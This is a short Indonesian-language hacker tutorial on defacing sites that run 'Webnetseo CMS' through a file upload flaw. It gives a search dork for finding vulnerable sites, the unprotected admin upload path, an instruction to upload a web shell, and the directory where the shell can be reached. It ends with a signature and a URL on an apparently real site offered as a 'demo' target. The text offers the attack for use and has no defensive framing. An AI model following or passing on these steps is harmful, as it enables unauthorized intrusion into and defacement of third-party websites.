Tutorial deface webnetseo file upload vulnerability
Kali ini cakil akan share tutorial deface
Webnetseo cms file upload vulnerability
Oke cekidot guys
Pro of concept
1.Dork ?
inurl:picc.php?id=
(Kembangin syang)
2.Exploit : localhost/path/admin/up.php
or
localhost/admin/up.php
3.upload shell lu cees :)
4.akses shell ?
localhost/images/upload_file/shell.php
or
Liat di url nya di bagian belakang.
localhost/images/upload_file/nomeracak_filename.php
And buum :v
Oke sekian dan terima kasih
Nitip nick boleh kan
./Mr.cakil
Demo ?
http://www.jsclyf.com/admin/up.php